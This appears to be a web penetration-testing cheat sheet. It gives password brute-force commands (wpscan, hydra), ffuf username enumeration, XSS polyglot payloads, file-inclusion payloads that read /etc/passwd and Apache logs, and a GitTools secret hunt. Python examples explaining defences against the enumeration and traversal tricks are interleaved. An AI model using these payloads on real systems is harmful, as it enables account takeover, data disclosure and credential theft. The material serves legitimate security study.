General Web

WordPress Scan:

wpscan --url <url> --usernames <username> --passwords /usr/share/wordlists/rockyou.txt

Hydra Web Bruteforce:

hydra -l <username> -P /usr/share/wordlists/rockyou.txt <IP ADDRESS> http-post-form "/<path to login.php>:<param1>=<param1 value>&<password param>=^PASS^:<unique text shown on a failed login>"

Authentication

Discover Usernames Using ffuf:

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://<domain> -mr "username already exists"
Flag   Description
-w     Wordlist
-X     Request method (here POST)
-d     Request body; FUZZ is replaced by each wordlist entry
-H     Adds a request header
-u     URL to fuzz
-mr    Match regex: only show responses whose body contains this text (here, the message shown for a valid, already-registered username)
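The ffuf command above works only because the registration endpoint answers differently for a taken username. The following is an added illustration, not code from the original cheat sheet: a registration handler that leaks that difference beside a hardened one that returns the same status and body either way, plus a small regression check that reports any candidate whose response differs from a non-existent baseline name. The user store, message strings and function names (register_leaky, register_hardened, differing_responses) are constructed for this example.

```python
"""Username enumeration through differing registration responses.

Added example (not from the original page). The vulnerable handler returns
the string an enumeration filter keys on; the hardened handler returns one
generic response and moves the real outcome out of band.
"""

# Constructed user store standing in for the application's database.
EXISTING_USERS = {"admin", "alice"}

LEAKY_MESSAGE = "username already exists"      # the text the -mr filter matches on
GENERIC_MESSAGE = "If the details are valid, a confirmation email has been sent."

OUT_OF_BAND_QUEUE = []  # stands in for an email/notification queue


def register_leaky(username: str, email: str, password: str) -> tuple[int, str]:
    """Vulnerable: status and body reveal whether the username is taken."""
    if username in EXISTING_USERS:
        return 400, LEAKY_MESSAGE
    return 200, "Registration successful"


def register_hardened(username: str, email: str, password: str) -> tuple[int, str]:
    """Hardened: identical status and body whether or not the username exists.

    The distinguishing action (notify the existing owner vs. create the
    account) happens out of band, so the HTTP response carries no oracle.
    """
    if username in EXISTING_USERS:
        OUT_OF_BAND_QUEUE.append(("notify-existing-owner", email))
    else:
        OUT_OF_BAND_QUEUE.append(("create-account", email))
    return 200, GENERIC_MESSAGE


def differing_responses(handler, candidates):
    """Regression check: list candidates whose response differs from the
    response for a name that certainly does not exist. An empty list means
    the handler gives no enumeration oracle on status/body."""
    baseline = handler("zz_nonexistent_probe_zz", "x@example.invalid", "x")
    return [c for c in candidates
            if handler(c, "x@example.invalid", "x") != baseline]


if __name__ == "__main__":
    names = ["bob", "admin", "carol", "alice"]
    print("leaky handler leaks:   ", differing_responses(register_leaky, names))
    print("hardened handler leaks:", differing_responses(register_hardened, names))
```

A constant response body is necessary but not sufficient: if only the new-account branch does expensive work (password hashing, database insert), response timing still distinguishes the two cases, so both branches should cost the same or the work should be deferred to the queue.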


XSS Polyglots

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('1')//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/*%0D%0A%0d%0a*/(/* */oNcliCk=alert() )//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3ciframe/<iframe/oNloAd=alert()//>\x3e

File Inclusion

# Read source via the base64 php://filter; the ./dir/../ prefix defeats a naive required-path check
php://filter/read=convert.base64-encode/resource=./somerequiredpath/../index

# Bypass for a filter that strips "../" in a single, non-recursive pass: each "....//" collapses to "../"
....//....//....//....//....//etc/passwd

# LFI: read the Apache access log through php://filter (the trailing &ext= is application-specific)
php://filter/resource=./dog/../../../../../../../var/log/apache2/access.log&ext=
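The "....//" form above only becomes a traversal after a broken filter has processed it. The following is an added example, not code from the original page: it shows what a single-pass strip does to that payload, why stripping to a fixed point is still not enough, and a resolver that canonicalises the joined path and checks containment in the intended base directory, which also refuses php:// style wrappers. The base directory, file names and function names (naive_strip, recursive_strip, resolve_within, demo) are constructed for this example.

```python
"""Path-filter bypass versus a containment check.

Added example (not from the original page). A filter that removes "../" once
turns the doubled payload into a real traversal; a canonicalise-then-contain
check rejects the result however the input was spelled.
"""
import os
import tempfile

# Payload from the cheat sheet above.
BYPASS = "....//....//....//....//....//etc/passwd"


def naive_strip(path: str) -> str:
    """The kind of filter the bypass targets: removes "../" once, non-recursively."""
    return path.replace("../", "")


def recursive_strip(path: str) -> str:
    """Stripping to a fixed point closes this bypass, but still accepts absolute
    paths and stream wrappers, so it is not a sufficient control on its own."""
    while "../" in path:
        path = path.replace("../", "")
    return path


def resolve_within(base_dir: str, user_path: str):
    """Return the canonical path if it stays inside base_dir, otherwise None.

    A scheme prefix (php://, file://, ...) is refused outright; everything else
    is joined to the base and canonicalised with realpath so that "..",
    doubled separators and symlinks are resolved before the containment test.
    """
    if "://" in user_path:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo() -> dict:
    """Run the checks against a constructed base directory and return results."""
    base = tempfile.mkdtemp()
    base_real = os.path.realpath(base)
    os.makedirs(os.path.join(base, "pages"))
    legit = os.path.join(base, "pages", "about.php")
    with open(legit, "w") as fh:
        fh.write("<?php echo 'about'; ?>")

    return {
        "naive": naive_strip(BYPASS),
        "recursive": recursive_strip(BYPASS),
        # Output of the broken filter is a plain traversal; containment rejects it.
        "after_naive_rejected": resolve_within(base, naive_strip(BYPASS)) is None,
        # The raw payload names literal "...." directories, so it resolves inside base
        # (to a file that does not exist); the traversal is created by the filter.
        "raw_stays_inside": resolve_within(base, BYPASS).startswith(base_real + os.sep),
        "plain_traversal_rejected": resolve_within(base, "pages/../../etc/passwd") is None,
        "wrapper_rejected": resolve_within(
            base, "php://filter/resource=./pages/../../etc/passwd") is None,
        "legit_allowed": resolve_within(base, "pages/about.php") == os.path.realpath(legit),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:26} {value}")
```

The practical rule the example demonstrates: do not try to sanitise traversal sequences out of user input; resolve the final path and decide on where it lands. Pairing that with an allow-list of permitted files, or an extension check applied after resolution, removes the need for the "&ext=" style tricks to matter at all.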

Git Find Secrets

# Tool: https://github.com/internetwache/GitTools
chmod +x extractor.sh
./extractor.sh /Downloads/Repo /Downloads/extract_Location

cd /Downloads/extract_Location
grep -Ri "password\|username\|token\|key" .
